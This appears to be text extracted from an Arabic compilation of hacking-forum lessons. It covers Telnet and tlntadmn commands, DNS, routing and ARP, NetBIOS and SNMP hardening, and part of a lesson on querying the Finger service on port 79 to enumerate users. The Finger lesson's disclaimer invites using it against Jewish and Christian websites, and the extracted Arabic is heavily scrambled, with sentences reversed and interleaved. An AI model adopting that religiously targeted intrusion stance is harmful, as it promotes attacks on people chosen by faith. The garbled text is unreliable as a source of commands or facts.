‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪."?Are you there‬‬ ‫‪esc‬‬ ‫إرسال حرف الهروب الحالي‪.‬‬ ‫ملحظات‬ ‫يمكنك اختصار هذا المر إلى ‪.‬‬ ‫‪ayt‬‬ ‫إرسال أمر "‪.c‬‬ ‫أمثلة‬ ‫لقطع التصال من ملقم بعيد ‪ ،Redmond‬اكتب‪:‬‬ ‫‪c redmond 44‬‬ ‫لرسال أوامر عميل ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[?] [send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫‪ip‬‬ ‫مقاطعة أمر العملية‪.‬‬ ‫‪synch‬‬ ‫أداء عملية تزامن ‪.‬‬ ‫‪ao‬‬ ‫إحباط أمر الخراج‪.Telnet‬‬ ‫لعرض العدادات الحالية لعميل ‪Telnet‬‬ ‫‪46‬‬ .

[+CTRL‬للعودة إلى جلسة عمل ‪ ،Telnet‬اضغط ‪.Telnet‬‬ ‫ملحظات‬ ‫ل من جهازي‬ ‫يمكنك إدارة كمبيوتر عن بعد يشغل ملقم ‪ Telnet‬باستخدام الوامر ‪ tlntadmn‬إذا كان ك ً‬ ‫الكمبيوتر يشغلن نفس نظام التشغيل فإذا المطلوب ويندوز ‪ 2000‬استخدمه بي ويندوز ‪ .2000‬ل يمكنك‬ ‫‪47‬‬ .ENTER‬‬ ‫إدارة ملقم التلنت المحلي بالـ ‪tlntadmn‬‬ ‫لدارة كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .Telnet‬إذا كنت في جلسة عمل ‪) Telnet‬بعبارة‬ ‫ل بملقم ‪ ،(Telnet‬يمكنك الخروج من جلسة عمل ‪ Telnet‬لتعديل المعلمات بضغط‬ ‫أخرى‪ ،‬إذا كنت متص ً‬ ‫‪ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.Telnet‬‬ ‫‪pause‬‬ ‫مقاطعة ملقم ‪.Telnet‬‬ ‫‪continue‬‬ ‫استئناف ملقم ‪.Telnet‬‬ ‫‪stop‬‬ ‫إيقاف تشغيل ملقم ‪.‬‬ ‫‪start‬‬ ‫بدء تشغيل ملقم ‪.‫بناء الجملة‬ ‫‪display‬‬ ‫المعلمات‬ ‫بل‬ ‫ملحظات‬ ‫يسرد المر ‪ display‬معلمات التشغيل الحالية لعميل ‪ .

‬‬ ‫‪maxfail=PositiveInteger‬‬ ‫تعيين الحد القصى لمحاولت تسجيل الدخول الفاشلة المسموح بها للمستخدم‪ .‬يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من ‪10‬‬ ‫مليين‪.‬‬ ‫‪maxconn=PositiveInteger‬‬ ‫تعيين العدد العظمي للتصالت‪ .100‬‬ ‫لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫‪48‬‬ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫كمبيوتر يشغل ‪ Windows XP‬مث ً‬ ‫لتعيين الحد القصى لعدد التصالت على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬‬ ‫لتعيين العدد العظمي لمحاولت تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬يجب عليك تحديد هذا العدد‬ ‫بواسطة عدد صحيح موجب أصغر من ‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‫استخدام الوامر ‪ tlntadmn‬لدارة كمبيوتر عن بعد يشغل ‪ Windows 2000‬وملقم ‪ Telnet‬من‬ ‫ل‪.

‬‬ ‫انتهى‪،،،‬‬ ‫" معلومات عن الـ ‪" DNS‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< Dark Devil :‬‬ ‫قبل ان نبدأ دعونا نعقد اتفاق معا ‪:‬‬ ‫فلننسا كلمه هكر و لنبدأ فى تعلم الشياء التى توصلنا لكلمه هكر بمعنى الكلمه و طبعا الهكر ليس معنا‬ ‫تروجن هورسس او سب سفن ‪..‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫دائمًا يستخدم الـ ?‪ /‬لعرض التعليمات في موجه الوامر‪..‬الخ‬ ‫الهكر الحقيقى هو تعلم نظم التشغيل مثل اللينكس و اليونكس و تعلم لغات تصميم المواقع بجانب بعض لغات‬ ‫البرمجه التى يكون اهمها فى مجالنا هى لغه السى ‪C‬‬ ‫و الن دعونا من كل هذه الخلبيط و لنبدأ التكلم فى المفيد‪:‬‬ ‫نحن فى بعض الحيان نسمع عن اشياء كثيره و لكن ل نعرف ما هى و ل نحاول ان نكتشف و نعرف ما هى‬ ‫و فى هذا الملف سوف نتكلم عن شئ نسمع عنه كثيرا و لكن معظمنا ل يعرف‬ ‫ما هو ‪:‬‬ ‫و هذا الشئ هو ال ‪:DNS‬‬ ‫و سوف نبدأ بالتحدث عن هذا السم الذى يسمعه الكثيرين و لكن ل يعرفون ما هو ‪:‬‬ ‫و لنبدأ بالسؤال نفسه‬ ‫==================================================‬ ‫=========================‬ ‫ما هو ال ‪?DNS‬‬ ‫‪49‬‬ ....‫تحديد اسم الملقم الذي تريد إدارته‪ .‬‬ ‫‪timeout=hh:mm:ss‬‬ ‫تعيين فترة المهلة بالساعات‪ ،‬والدقائق‪ ،‬والثواني‪.

burn.(Berkeley Internet Name Domain‬و يوجد ايضا‬ ‫برامج مثل هذه للويندوز و الماكنتوش ايضا‬ ‫اذا اراد احد استعمالهم ك ‪ DNS SERVER‬و لكن الكل يفضل ال ‪.com‬فسيسئل المتصفح اقرب ‪ DNS‬موجود له )و هذا يعتمد على اتصالك‬ ‫بالشبكه و رقم الى بى الخاص بك( عن عنوان ال ‪ IP‬ل ‪/http://www.burn.‬‬ ‫و قبل هذا سيسئل ال ‪ daemon program‬فى جداوله اى فى ذاكره متصفحك عن الموقع الذى تطلبه‬ ‫فأذا لم يجده ينتقل الى ما سبق شرحه و هكذا تتم العمليه‪.burn.com‬‬ ‫لن المتصفح يحتاج هذا ال ‪ IP‬ليجد السرفر الذى لديه هذا الهوست اى هذا الموقع و يطلب محتويات الموقع‬ ‫من السرفر ليعرضها لك فى متصفحك‪.com :‬الى ‪ IP ADRESSES‬مثل ‪ 127. (IP‬‬ ‫و كان السم المستعمل ل ال ‪ address resolution‬قبل ال ‪ DNS‬كان يتكون من ملف اسمه ال‬ ‫‪ HOST FILE‬و كان عباره عن اسماء الهوستس اى المواقع‬ ‫و عنواوين ال ‪ IP‬الخاصه بهم و كان هذا الملف تتولى رعايته ‪Stanford Research Institute's‬‬ ‫‪ . address resolution‬و لكن قد ظهر ال ‪ DNS‬لجعل‬ ‫توزيع الهوستس اسهل بكثير من الماضى حيث انه من‬ ‫السهل ان تتذكر اسم موقع معين تريده افضل من ان تتذكر اربعه خانات من الرقام )‪.1‬و‬ ‫العكس صحيح و عندما تتم العمليه‬ ‫تتصل بالموقع مباشره‬ ‫و عمليه التحويل هذه تسمى ‪ address resolution‬اى تحويل او تحليل عنوان الموقع الى ‪ IP‬او‬ ‫العكس لنستطيع التصال به‬ ‫و قبل ظهور ال ‪ DNS‬كان اسم اخر لعمليه ال ‪. UNIX‬‬ ‫و يتكون برنامج ال ‪ DNS‬من جزئين ‪:‬‬ ‫‪ (the name server itself (the daemon program that listens to port 53‬و الخر‬ ‫يسمى ‪RESOLVER‬‬ ‫و ال ‪ NAME SERVER‬هذا يستجيب الى متصفحك عندما تطلب معلومه معينه فمثل عندما تفتح‬ ‫النترنت اكسبلورر و تكتب او تطلب منه موقه معين مثل‬ ‫‪ /http://www.‬‬ ‫هذا بالنسبه لمعلومات عامه عن ال ‪ DNS‬و كيف كان النظام قبل اكتشافه و هى ايضا نظره عامه عن حركه‬ ‫النترنت القديمه ‪.0.‬‬ ‫‪:THE DNS SERVER‬‬ ‫================‬ ‫ال ‪ DNS SERVER‬هو عباره عن كمبيوتر و يعمل عادتا على نظام ‪ UNIX‬او النظم الشبيهه باليونكس‬ ‫و يستخدم برنامج اليونكس ‪ BIND‬اى )‪ .0.‬‬ ‫‪:THE TREE INFORMATION‬‬ ‫======================‬ ‫و الن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم ‪ IP‬معين من المتصفح حقك و ل يجده فى ال ‪DNS‬‬ ‫‪50‬‬ .(Network Information Center (SRI-NIC‬و كان على هذا الراعى ان‬ ‫يجدد )‪ (UPDATE‬الجدول هذا حوالى كل اسبوع و يمده بالعنواوين الجديده و الرقام التى ظهرت و على‬ ‫السيستم ادمين ان يجدد هو الخر ملفه او‬ ‫عن طريق اتصال ال ‪ FTP‬بينه و بين الراعى اى ‪. Domain Name System‬و يتصل سرفر ال ‪ DNS‬عادتا على‬ ‫بورت ‪ 53‬مما يعنى انك اذا اردت التصال الى احد المواقع و استعملت ال ‪ DNS‬حقه فسوف تتصل‬ ‫به عن طريق البورت ‪ 53‬و سوف يترجم او يحول ال ‪ translates alphabetical hostnames‬و‬ ‫يعنى اسم الموقع مثل ‪ /http://www.‬‬ ‫و ال ‪ DNS‬ليس له مركز اى ‪ decentralized‬اى انه ليس هناك ماكينه او سيستم معين يتحكم فى كل‬ ‫ال ‪ DNS‬بل بالعكس فال ‪ DNS‬عباره عن داتا بيز‬ ‫موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر عليه ‪ DNS‬يعرف اين يبحث عندما يريد ان‬ ‫يحصل على معلومه معينه او هوست معين‪.‫==============‬ ‫اول ‪ DNS :‬هو اختصار لكلمه ‪ .SRI-NIC‬‬ ‫و طبعا مع تطور النترنت الرهيب و السريع بدأ هذا النظام فى الفشل و بدأو يبحثون عن النظام المثل الذى‬ ‫يستطيع التحكم فى الهوست و الى بى‬ ‫معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظهر ال ‪ DNS‬ليفعل ذلك‪.

‬‬ ‫‪ university.‬و فى حاله انه ل‬ ‫يجده سوف تأتيك رساله من متصفحك تقول ‪ address could not be found‬و هذا يحدث نتيجه‬ ‫اعطاء المتصفح ‪ HOST‬او ‪ IP‬خطأ ليبحث عنه و بالتالى طبعا فهو ليس موجود من الساس ليعرضه او‬ ‫نتيجه طول البحث فيقوم متصفحك بقدان التصال مع ال ‪ DNS‬اى عمليه ‪. england. airforce.isp.uk‬بالبحث فى جداوله‬ ‫المحليه المخذنه فى الذاكره عنده فيجدها و اذا لم يجدها فسينتقل كما قلنا الى مستوى اعلى من ال ‪DNS‬‬ ‫‪ SERVER‬ليبحث فيه و اذا لم يجده ايضا فى المستوى العلى فعليه ان يقوم بتغيير مكان البحث كليا فمثل‬ ‫من ‪ dns.DOMAIN NAME‬‬ ‫‪?When and why does DNS "hang" or fail‬‬ ‫======================================‬ ‫و يمكن ايضا لل ‪ DNS‬ان يكون بطئ او سريع ‪.uk‬و هذا يعتمد على اتصالك بالنترنت اى حسب‬ ‫الشركه و السرفر الذى تشبك عليه فمن الطبيعى طبعا ان يكون ال ‪ISP's DNS server's‬‬ ‫‪ hostname‬مثل هذا ‪ dns.co.uk‬الى ‪ some-organization.uk.uk.mil.burn.co.DNS SERVERS‬‬ ‫و طبعا نتيجه من هذا التصال فنستنتج وجود شجره اتصال و معلومات و لكن كيف تعمل بالضبط‬ ‫دعونا نأخذ مثال ‪:‬‬ ‫لو فرضنا ان ال ‪ ISP‬الخاص بك كان مثل ‪ isp.uk‬و الخ و هناك امثله كثيرا طبعا و كل‬ ‫شئ ينتهى ب ‪ UK‬و اذا لم يجده ايضا فى كل الماكن المتاح له البحث فيها فسيرجع المتصفح الى اكبر‬ ‫‪ DNS‬موجود على الشبكه و اسمه ال ‪ ROOT‬فهو يحتوى على كل عناوين ال ‪ IP‬على كل للمواقع‬ ‫الموجوده على اى ‪.‬‬ ‫انتهى‪،،،‬‬ ‫‪51‬‬ .‬اما اذا انتقل المتصفح للبحث‬ ‫فى مستوى اعلى من ال ‪ DNS‬فسوف يحتاج الى قليل من الوقت يمتد حتى ‪ 15‬ثانيه ‪ .isp.uk‬او ‪school.gov.org.‬‬ ‫ارجو ان اكون قد افدتكم جميعا بهذه المعلومات التى هى بعيده عن الهكر و لكنها اساس فى تعلم الهكر يا‬ ‫اصدقائى و كما قلت لكم الهكر ليس التروجان و الباتشات الهكر هو تعلم اساليب البرمجه و كيفيه تصميم‬ ‫المواقع و معرفه كل شئ جديد فى عالم النترنت و ارجو من المحترفين الدخول و قرائه الموضوع و تصحيح‬ ‫الخطاء التى به حتى يكون موضوع كامل و متكامل خالى من الخطاء و نتظر ردودكم و تفاعلكم مع‬ ‫المعلومات و اى سؤال انا موجود على قد مقدرتى‬ ‫و انتظرو موضوعى القادم و هو معلومات عن ال ‪ SSL‬و سنعرف ما هو بالتفصيل‬ ‫و السلم عليكم و رحمه ال و بركاته‪.edu.uk.co.isp.ac.co.com‬مثل فسيقوم هذا ال ‪ dns.‬اذا كان ال ‪ ISP‬الخاص بك يحنوى على ال ‪ IP‬الذى طلبته‬ ‫فسوف يحتاج فقط الى اجزاء من الثانيه ليأتى به لك و يعرضه فى متصفحك‪ .uk‬و الن فالنفرض انك سألت هذا ال ‪ DNS‬ليبحث لك عن ‪IP‬‬ ‫الخاص ب ‪ /http://www. TIMED OUT‬‬ ‫و فى هذه الحاله نضغط فى المتصفح على ‪ REFRESH‬او ‪ RELOAD‬طبعا حسب متصفحك ‪.‫المحلى اى الخاص بك سوف يسأل ال ‪ DNS SERVER‬العلى منه فى المستوى عنه ليجده و اذا لم يجده‬ ‫فى مستوى اعلى فينتقل للبحث فى مستوى اعلى و اعلى و هكذا يسير البحث من القل الى العلى فى‬ ‫مستويات ال ‪.

‬‬ ‫و فى سياق النترنت يوجد ثلث مظاهر من الروتنج وهم‪:‬‬ ‫‪Physical Address Determination-1‬‬ ‫‪Selection of inter-network gateways-2‬‬ ‫‪Symbolic and Numeric Addresses-3‬‬ ‫‪52‬‬ .‫" معلومات عن ‪" Routing in the Internet‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< Dark Devil :‬‬ ‫السلم عليكم و رحمه ال و بركاته‪:‬‬ ‫سوف نتكلم يا اصدقائى عن شئ مهم فى علم الشبكات و الكثير منكم على غير علم به و هذا الشئ هو ال‬ ‫‪.Routing‬‬ ‫و الن دعونا نبدأ و اتمنى ان يعجبكم الموضوع و تستفيدون منه‪:‬‬ ‫‪:Routing in the Internet‬‬ ‫=========================‬ ‫‪!?what is routing‬‬ ‫الروتنج هو عباره عن تكنيك او ميكانزم الذى عن طريقه تنتقل المعلومات من كمبيوتر الى اخر او من‬ ‫هوست الى اخر‪.

2‬‬ ‫‪dynamic 20-53-52-43-00-00 213.com‬الى ‪ ip‬اى الى اشياء رقميه معقده صعبه و تؤدى هذه المهمه عن طريق ال‬ ‫‪) DNS‬ارجو مراجعه موضوعى الول عن ال ‪ DNS‬للستفاده اكثر (‪.238‬‬ ‫النترنت ادرس الموجود امامكم هذا هى عناوين كل الشبكات المتصله بجهازى بعد دخولى الى النترنت‬ ‫و ال ‪ Physical Address‬اعتقد انكم تلحظون انه ثابت ل يتغير و بهذا يمكننا ان نقول و نوضح لكم ان‬ ‫ال ‪ Physical Address‬هذا هو ال ‪ Mac Address‬اى رقم الجهاز نفسه الذى تتصل به النتوركس‬ ‫اثناء العمل و لذلك فقد قلت فى كلمى ان تحديد ال ‪ Physical Address‬مهم جدااا فى عمليه نقل‬ ‫معلومات او داتا ال ‪ ip‬لنه بدون ‪ Physical Address‬اذن فكيف ستتعرف الباكيدجس الموجوده فى ال‬ ‫‪ router‬على طريقها‪.(local network address or physical address within the frame‬‬ ‫و الشئ الثانى من المذكور اعله مهم ايضا و درورى لن النترنت تتكون من عدد من النت وركس المحليه‬ ‫اى ‪ local networks‬مربوطه بواحد او كثير من المداخل اى ال ‪.17‬‬ ‫‪dynamic 20-53-52-43-00-00 213.46. routers‬احيانا يكون لها اتصالت فيزيائيه او بورتات مع الكثير من النت‬ ‫وركس ‪.‬‬ ‫و الثالث من المذكور هو الذى يتضمن انتقال العنوان اى ال ‪ address translation‬من الشكل الكتابى‬ ‫الذى نعرفه و نستطيع التعرف عليه بسهوله و المقصود مثل عنوان المتصفح اى‬ ‫‪ /http://www.‬و تحديد المدخل الملئم و البورت لتفصيل داتا ال ‪ ip‬هذا ما نسميه روتنج اى ‪ routing‬و تتضمن‬ ‫ايضا داخل تبادل المعلومات بطرق معينه‪.‬فمن الدرورى ان نغلف هذه‬ ‫الداتا الخاصه بال ‪ ip‬بأى أطار من اى صيغه تكون متصله بالنت ورك المحليه للجهاز او بالنت ورك المتصل‬ ‫بها الجهاز فى حالته الموجود عليها عند انتقال هذه الداتا‪.135.‬‬ ‫و ال ‪ type‬هذا مكتوب ‪ dynamic‬اى انه غير ثابت بمعنى انه يتغيير عند عمل ريستارت لكل مره فى‬ ‫الجهاز و لكنه يثبت اثناء العمل على النترنت ‪.226.gateways‬و هذه المداخل عموما‬ ‫تسمى بالروترس اى ال ‪. physical addresses‬فمثل هذا الجدول يحتوى على عناوين ال ‪ip‬‬ ‫للنتوركس و الدرس او العنوان المعروف لها ‪.burn.‬‬ ‫و للحصول على هذا الجدول و قرائته من الطبيعى ان يكون الكمبيوتر يستخدم بروتوكول معين للحصول على‬ ‫هذا الجدول و تحويل ال ‪ ip‬الى ‪ physical addresses‬و هذا البروتوكول يعرف بأسم ‪ ARP‬اى‬ ‫‪ Address Resolution Protocol‬اى بروتوكول تحليل الدرس و اعتقد اننا الن ادركنا و فهمنا‬ ‫معنى كلمه تحويل ال ‪ ip‬الى ‪ .‬‬ ‫‪53‬‬ . cache‬‬ ‫و للحصول على الجدول نستخدم امر ‪ arp -a‬و فى اليونكس ايضا نستخدم نفس المر‪.‬‬ ‫و الن ندخل فى شرح عمليه تحديد ال ‪ Physical Address‬اى ‪:‬‬ ‫‪:Physical Address Determination‬‬ ‫===============================‬ ‫اذا كان يريد جهاز كمبيوتر ان ينقل ‪ ip data‬اذن فأنه يحتاج الى ان يغلف بأطار مخصص و تابع للنتورك‬ ‫المتصل الجهاز بها‪ .‫و يعتبر الول فى هذه الشياء هو المهم عندما تنتقل داتا ال ‪ ip‬من الكمبيوتر‪.‬و هذا يتم بنجاح و ببساطه عن طريق استخدام جدول سوف‬ ‫يوضح كيفيه تحويل ال ‪ ip‬الى ‪ .‬و يتطلب هذا الغلف التضمين من ال عنوان النت‬ ‫ورك المحليه او العنوان الفيزيائى لهذا للشبكه مع الطار الذى يحيط بالبيانات اى )‪inclusion of a‬‬ ‫‪.131.102 on Interface 0x2‬‬ ‫‪Internet Address Physical Address Type‬‬ ‫‪dynamic 20-53-52-43-00-00 207.‬‬ ‫و هذا مثال حى من جهازى على الجدول الذى يظهر بعد تنفيذ المر ‪:‬‬ ‫‪C:\WINDOWS>arp -a‬‬ ‫‪Interface: 62.64.9.65.131. physical addresses‬و يمكن ان نعرف هذا الجدول بأسم ‪ARP‬‬ ‫‪.‬و لنجاح هذا النتقال فى ظل الغليف بهذا الطار من الدرورى ان نحدد ما يسمى بال‬ ‫‪ physical address‬لتجاه الكمبيوتر‪ .

‫و هناك النوع الخر و هو ال ‪ static‬اى الثابت الذى ل يتغير "هذا فقط للتوضيح"‬ ‫اعتقد الن اننا فهمنا بمعنى بسيط ما هو الروتنج و ما هى ال ‪routers‬‬ ‫انتهى‪،،،‬‬ ‫" ‪" NETBIOS‬‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫بعد قراءة هذا الموضوع ستكون قادر على‬ ‫•‬ ‫•‬ ‫•‬ ‫صد الجلسات الخالية‬ ‫منع تعداد المستخدمين‬ ‫منع تعداد الـ ‪SNMP‬‬ ‫يوجد في العداد الفتراضي للويندوز اعتماد على ‪ NetBIOS‬وهي مشكلة كبيرة لصحاب الشبكات المهمة لن الـ‬ ‫‪ NetBIOS‬لها واجهات تداخل ‪ API‬تعيد وترجع معلومات حول الهدف من خلل المنفذ ‪ 139‬لـ ‪ ، TCP‬وفي الحالة‬ ‫الفتراضية يكون الوصول ممكن حتى من مجهولين الهوية ‪ ،‬وطبعا هذا يكون فيه خطرًا قد يكون كبير عند استخدامه من‬ ‫محترفين الولوج على أنظمة ‪NT‬‬ ‫تستطيع أن تلغي كل خدمات ‪ NetBIOS‬على جهاز ما عندما تجد أنها غير ظرورية لك ويكون ذلك من خصائص ‪ TCP/IP‬ثم من‬ ‫‪ Advanced‬ثم من التبويب ‪ WINS‬ثم تعلم على الخيار الواضح في المثال التالي‬ ‫‪54‬‬ .

.‬‬ ‫وتوجد أدوات رسومية شعبية كثيرة على النترنت للقيام بنفس العمل منها على سبيل المثال البرنامج ‪، Legion‬‬ ‫‪‬‬ ‫الحل المريح‬ ‫‪55‬‬ .‬‬ ‫ولمشاهدة شرح ميسر من ‪.‬‬ ‫وتوجد بعض الدوات المتاحة على النترنت تقوم بنفس العمل بشكل احترافي منها هذه الداة المدعوه ‪ Nbtscan‬وهي أيضًا اداة سطر‬ ‫أوامر وتستطيع أن تحملها من ‪....‫ل مناسبًا وهى تدعى ‪ RestrictAnonymous‬وهي تحد بشكل كبير‬ ‫وإذا كانت هذه الخدمة مهمة لك فقد قدمت شركة مايكروسوفت ح ً‬ ‫من تسرب المعلومات عبر الوصلت المجهولة ‪ ،‬وتستطيع الوصول إليها من ‪ Administrative TOOLS‬ثم من ‪Local Security‬‬ ‫‪ policy‬ثم من النافذة نختار ‪ Local poicies‬ثم من ‪ security options‬ثم نعلم على الخيار الول ‪Additional restrictions‬‬ ‫‪ for anonymous connections‬ثم بالزر اليمن نختار ‪ security‬ثم من النافذة نختار من الشريط المنزلق الخيار ‪No Access‬‬ ‫‪ Without Explicit Anonymous Permissions‬مثل المثال‬ ‫بعض المثله لستخدام أدوات الـ ‪NetBIOS‬‬ ‫‪‬‬ ‫‪Net View‬‬ ‫هذه الداة مضمنه ضمن نظام التشغيل نفسه وهي أداة سطر اوامر على ‪ NT/W2000‬وهي تعرض الميادين المتاحة وكل الجهزة على‬ ‫هذه الميادين وكل الخدمات المتاحة لتشارك على الجهزة ‪ ،‬ويكفي أن تكتب عنوان ‪ IP‬أو اسم الدومين حتى تكون قد حصلت على ما‬ ‫تريد‬ ‫ولمعرفة المزيد عن إستخدامات المر ‪ Net‬في إدارة‬ ‫الشبكة انقر ‪.

‫الحل المريح لتخلص من هذا الصداع هو حماية المنافذ المقدمه من البروتوكول ‪ TCP‬و البروتوكول ‪ UDP‬عبر المنافذ من ‪ 135‬إلى‬ ‫المنفذ ‪ ، 445+ 139‬وكل برامج الجدران النارية المتقدمة تستطيع من خللها أن تتحكم بالمنافذ بشكل مريح ‪ ،‬وشاهدنا كيف نلغي‬ ‫الخدمة ‪ NetBIOS‬أو نقلل من المشاكل المحتمله منها ‪ ،‬ورغم كل ذلك لزال الخطر موجودًا إذا كنت تستخدم البروتوكول ‪SNMP‬‬ ‫لدارة الشبكة على ويندوز ‪ 2000‬سيرفر ‪ ،‬فهذا البروتوكول يمرر كل المعلومات المطلوبة إذا كان مثبتا ‪ ،‬ولتأمين هذا البروتوكول بالشكل‬ ‫المطلوب أمامك خيارين الول‬ ‫حذف اسم المجموعة ‪ Public‬التي تكون عند التثبيت الفتراضي وتكون أسماء مخصصة من مستخدمين الشبكة كما في المثال‬ ‫المجموعة ‪ public‬موجودة علم عليها ثم من الزر ‪ Remove‬ثم حرر المربع ‪Send authentication trap‬‬ ‫بذلك تكون قد حصرت استخدام هذا البروتوكول للشخاص المختارين فقط‬ ‫والحل الثاني من محرر السجل ‪regedit‬‬ ‫‪HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent‬‬ ‫ل إ ذا كان ما حذفته رقمه = واحد أعد الترقيم‬ ‫ثم قم بحذف المفتاح ‪ LANManagerMIB2Agent‬ثم قم بإعادة ترقيم المدخلت مث ً‬ ‫ليبدأ من واحد للمدخل رقم ‪2‬‬ ‫هل تعلم أن‬ ‫البروتوكول ‪ TCP/IP‬يستطيع العمل بشكل سليم بدون خدمات الـ ‪ ، NetBIOS‬لذلك إذا كنت‬ ‫غير محتاج إليه تعطيله أفضل‬ ‫ةةةةةةةة‬ ‫‪56‬‬ .

‬‬ ‫هذه الجابة ستخبرك من هم المستخدمين على هذا النظام و أيضا‬ ‫بعض المعلومات عن هؤلء المستخدمين المتصلين بالنظام‪.5‬الستعلم عن طريق موقع بأستخدام ‪Finger‬‬ ‫‪ 1.3‬استخدام ‪Finger‬‬ ‫‪ 1.1‬تبرئة‪:‬‬ ‫>=========<‬ ‫هذا الدرس فقط للتعليم والتطبيق على مواقع اليهود والنصاري الضاره للمسلمين‬ ‫فالكاتب ل يتحمل اي مسؤولية للستخدام السيء لهذا الدرس ضد أخواننا المسلمين‪.‬‬ ‫المستخدم البعيد)‪ ( remote user‬يمكن أن يرسل طلب إلى ‪ Finger‬ديمون يجري على نظام معين‬ ‫)بورت ‪ Finger‬نوعية ‪ (79‬وسيحصل على إجابة‪.2‬مقدمة عن ‪Finger‬‬ ‫>===================<‬ ‫ن ‪ Finger‬ديمون خدمة تعمل عن طريق البورت ‪ 79‬عادة وكانت‬ ‫إّ‬ ‫مستخدمة أصل كنوع ‪ businesscard‬رقمي للناس‪.‬‬ ‫‪57‬‬ .7‬الختام‬ ‫‪ 1.4‬بعض الخدع عند استخدام خدمة ‪Finger‬‬ ‫‪ 1.2‬مقدمة عن ‪Finger‬‬ ‫‪ 1.1‬تبرئة‬ ‫‪ 1.‫" بروتوكول خدمة ‪"Finger‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫>ةةةةةة‪<LAMeR :‬‬ ‫السلم عليكم ورحمة ال وبركاته‬ ‫اتمنى انكم تتقبلون مني هذا الدرس عن بروتوكول خدمة ‪ Finger‬التي تعمل على بورت ‪79‬‬ ‫بسم ال نبدأ الدرس‬ ‫فهرس محتويات الدرس‬ ‫>================<‬ ‫‪ 1.6‬الستنتاج من هذا الدرس‬ ‫‪ 1.‬‬ ‫‪ 1.

‫إضافة إلى هذه المعلومات‪ .foobar.com‬‬ ‫له ‪ Finger‬ديمون يعمل‪.‬‬ ‫الن كيف نقوم بـ)‪ (request‬طلب استعلم؟‬ ‫عن طريق وندوز‬ ‫في أغلب الحيان وندوز ل يوجدبه زبون )‪ (client‬خاص للـ ‪ Finger‬مركب ) ‪( installed‬‬ ‫لذلك سوف نستخدم ‪ Telnet‬كخادم لـ ‪Finger‬‬ ‫‪-‬توضيح‪--‬‬‫‪Telnet(client) --------request-------> Finger Deamon(in Server) o‬‬ ‫عن طريق كتابة السطر التي في موجة الدوس )‪: ( MS DOS‬‬ ‫‪telnet http://www.‬وكان ‪ Finger‬يستخدم قديما في‬ ‫الجامعات و الشركات الكبيرة أيضا‪.‬‬ ‫‪ portscans‬للبحث عن البورتات المفتوحة‪ .‬‬ ‫في الماضي ‪ ،‬الـ ‪ Finger‬إستعمل عامة عن طريق الطلب في الجامعات‬ ‫اذا ارادوا معلومات تخص طلب اخرين في نفس الجامعه‬ ‫وكثيرا ما تكون الجابة )اجابة ‪ ( Finger Deamon‬بجملة " ‪ " !Finger me‬اي "أعلمني ! "‬ ‫أما الن ومع وجود شبكة النترنت العالمية اصبح ‪Finger‬‬ ‫أقل شهرة ‪ ،‬لنه توجد الن‬ ‫مواقع الويب للعمل كبطاقة عمل)‪ (bisinesscard‬رقمية خاصة بمستخدمين النترنت وبسبب ملحظة‬ ‫الناس‬ ‫التهديد الواسع للمن اللكتروني قّل استخدام خدمة ‪Finger Deamon‬‬ ‫على أية حال‪،‬‬ ‫ليس كل النظمة منعت هذه الخدمة وستجد بعض المواقع ) النظمة( تقدم هذه الخدمة‪.com‬ووجدت به منفذ )‪ Port‬بورت( ‪ 79‬مفتوحا‬ ‫هذا يعني ان ‪/http://www.‬‬ ‫لهذا سوف أحاول ان اشرح في هذا الدرس بلغة مفهومة‬ ‫ما هو ‪ Finger‬ديمون وماذا يفعل وكيف يمكن استخدامه في مصلحتك‬ ‫الخلصة المقدمة‪ :‬ان خدمة ‪ Finger‬كانت قديما ولزالت تستخدم لجلب المعلومات عن‬ ‫المستخدمين الموجودين في النظام و هل لديهم حسابات في هذا النظام ام ل ‪.foobar.‬‬ ‫وهذه اليام يقوم الهكرز بمحاولت اختراق النظمة بأستخدام برامج‬ ‫ي أساس علمي ‪.foobar.‬‬ ‫ملحظة ‪ :‬النظام) ‪ ( server‬هو جهاز كمبيوتر 